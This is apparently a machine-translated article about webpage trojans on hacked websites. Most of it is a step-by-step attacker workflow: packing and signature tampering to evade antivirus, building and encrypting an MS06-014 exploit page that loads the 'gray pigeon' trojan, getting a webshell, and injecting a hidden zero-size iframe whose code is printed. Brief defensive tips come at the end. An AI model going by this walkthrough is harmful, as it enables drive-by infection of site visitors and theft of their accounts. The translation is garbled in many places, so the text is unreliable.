Analyze and clear webpage trojans on the web Server

It is relatively safer to use non-ie core browsers

Many of my friends have encountered this phenomenon: When a website is opened and the results page is not displayed, the anti-virus software starts to issue an alarm, prompting you to detect the trojan virus. Experienced users will know that this is webpage malicious code, but they open formal websites. No formal website will put viruses on its own webpage, right? So what causes this phenomenon? One of the most likely reasons is that the website has been infected with Trojans.

Currently, we often hear the term "Trojan". What is Trojan? Trojans are Web Trojans that hackers intrude into some websites and embed their webpage Trojans into the homepage of the hacked website. They can use the traffic of the hacked website to spread their webpage Trojans, to achieve your own ulterior motives. For example, many game websites are infected with Trojans. Hackers aim to steal the game accounts of gamers browsing the website, while those large websites are infected with Trojans to collect a large number of bots. Websites infected with Trojans will not only lead to loss of credibility and loss of a large number of customers, but also cause common users to fall into the trap set by hackers and become a zombie of hackers. Let's take a look at this most popular hacker attack method.

Trojan core: Trojan

From the word "Trojan", we can know that this cannot be separated from Trojans. Indeed, the purpose of Trojan horse mounting is to spread the Trojan horse. It is only a means. Trojan horses can be divided into two categories: one is for remote control. Hackers use this type of Trojan horse to initiate a trojan attack, in order to obtain a large number of bots, to launch a Denial-of-Service attack on some websites or for other purposes (at present, the vast majority of computers that initiate a Denial-of-Service attack are victims of a Trojan attack ). The other type is the key-record Trojan. We usually call it a hacking Trojan. Its purpose is self-evident and is directed at our game account or bank account. Most Trojans currently used by Trojans belong to the latter.

Trojan-free Tactics

Trojan Horses used for Trojan horses must be highly concealed, so that users can run the trojan without knowing it, And the trojan pages can survive for more time. Hackers use many tricks to prevent trojans from being detected and killed by antivirus software. The following methods are generally used:

Shell processing: we have introduced the concept of shell to prevent others from modifying compiled program files and compressing program volumes. After a trojan is shelled, it may escape the scanning and removal of antivirus software. This is also the reason why we installed antivirus software and infected the old virus. Although the current anti-virus software supports shelling the program before scanning and killing, it is only limited to some popular shelling programs, such as aspack and UPX, however, when a trojan is processed by a shell program, it is powerless. Therefore, shelling is still one of the Common kill-free tactics used by hackers.

Shell Program for cold door

Pattern modification: Anti-Virus Software determines whether a program is a virus based on the virus pattern. When anti-virus software detects a program, if a virus pattern is detected in the program, the program is regarded as a virus. Hackers also understand this truth, so they will modify part of the code identified as a pattern in the Trojan and encrypt it or use assembly instructions to redirect it, in this way, anti-virus software cannot find the virus pattern in the Trojan, and it will not be regarded as a virus.

Although both methods can survive anti-virus software detection and removal, we still have a way to prevent trojans from running. The specific methods are described in the Prevention Section. So how does a trojan mount on a website? Here, we take the "gray pigeon" Trojan as an example to demonstrate the process of hacking. The "gray pigeon" Trojan used in the demonstration has been killed-free, and anti-virus software cannot be killed.

Latent attackers: webpage Trojans

Why does a trojan program run when a webpage is opened? This involves the concept of Web Trojan. A webpage Trojan is a combination of a Trojan and a webpage. When a webpage is opened, it also runs a Trojan. The principle of Web Trojan is to use ActiveX Control of IE browser. After a web Trojan is run, a download prompt is displayed. Only after you click OK will the trojan be run. This kind of Web Trojan still has a little value in use when the network security awareness is generally low, but its disadvantage is obvious, that is, the ActiveX control download prompt will appear. Of course, few people will click the inexplicable ActiveX Control download Confirmation window.

In this case, a new webpage Trojan is born. This kind of Web Trojans usually take advantage of the vulnerabilities in the IE browser. They are not prompted during operation, so they are extremely concealed. It can be said that the endless vulnerabilities in Internet Explorer have resulted in a network where webpage Trojans are rampant today. For example, the recent IE browser vulnerability MS06-014 can be used to create an absolutely hidden Web Trojan. Next let's take a look at the process of making a web Trojan using MS06-014.

Of course, there must be a Trojan program for webpage Trojans. Here we use the "gray pigeon" Trojan mentioned above. Then we will download a MS06-014 web Trojan generator. Next, you need a webpage space. After the three are ready, you can start testing.

Generate webpage Trojan

First, upload the trojan program to the webpage space. Run the MS06-014 Trojan generator, enter the trojan URL that has been uploaded to the space in the Trojan address, and check the "Hide source code" option below. This option automatically clears the webpage source file after the webpage Trojan runs. Even if you are suspicious, you cannot find any trace. Of course, the source files opened by the user are cleared, but webpage Trojans are not affected. Click "generate network horse" to generate a webpage trojan named "muma.htm" in the program's same directory.
Configure the webpage Trojan to continue the configuration of the webpage Trojan, and browse the selected webpage trojan in "to encrypt the webpage. Web trojan uses the IE vulnerability during operation, and there must be a vulnerability exploitation code, which will be detected by anti-virus software. Therefore, it is not enough to encrypt the trojan program to operate the webpage Trojan implicitly, you also need to encrypt webpage Trojans. The MS06-014 Trojan Builder provides four web page encryption methods: Empty character encryption, Escape Character encryption, Escape encryption, and split signatures. Here, we use the "Escape Character encryption" encryption method, select the "Escape Character encryption" option, and click the "encryption" button to generate a webpage Trojan without killing. Upload the encrypted webpage Trojan to the webpage space.

Search for defective websites and write webpage Trojans

After preparing the webpage Trojan, you are waiting to find the target website for Trojan. At this time, hackers will search everywhere to find website programs with Script defects. After finding them, they will use website program vulnerabilities to intrude into the website and get a webshell of the website. In this case, you can edit the content of the homepage and insert the trojan code. Code: <iframe src = "/muma.htm"; width = "0" height = "0" frameborder = "0"> </iframe>, the src parameter is followed by the webpage Trojan address. When we open the homepage of this website, the webpage Trojan page will pop up, which we cannot see, because we set the window width of the pop-up page to 0 in the code. At this time, the Trojan has been quietly downloaded to the local machine and run. We can see that the homepage of the website is normal, anti-virus software does not respond, but the trojan is running. It can be seen that the concealment of the Trojan is very high, and the harm is quite serious.

"Trojan" attacks have become the most popular attack methods currently. How can we defend against a large number of "Trojan" websites? As a webmaster, how do we know that our website has been infected with Trojans? Webmaster prevention: if you are a webmaster, you can check the source code of the homepage and other main pages. For example, after opening these pages with notepad, search with the keyword "<iframe>". After finding the keyword, you can check whether it is a trojan code. However, experienced hackers will write a piece of code to encrypt the entire Trojan code, which makes it difficult for us to find the trojan code on the webpage. At this time, we can use a system specially designed for webpage Trojan code detection produced by Beijing zhiheng alliance, which can help solve the large amount of code, webpage Trojans are difficult to check in various forms. Regular system upgrades can detect more than 1000 types of webpage Trojans!

Common User prevention: common users are concerned with how to prevent "Trojan" attacks. Since anti-virus software becomes blind in front of webpage Trojans, we cannot perceive whether the website is infected with Trojans ". In this case, isn't it true? We already know the operating principle of Web trojan uses the vulnerability of IE browser, so as long as we update the system patch in time, we can invalidate web Trojan. To enable "Auto Update", right-click "my computer", select "properties", switch to the "Auto Update" tab, and select "auto (recommended).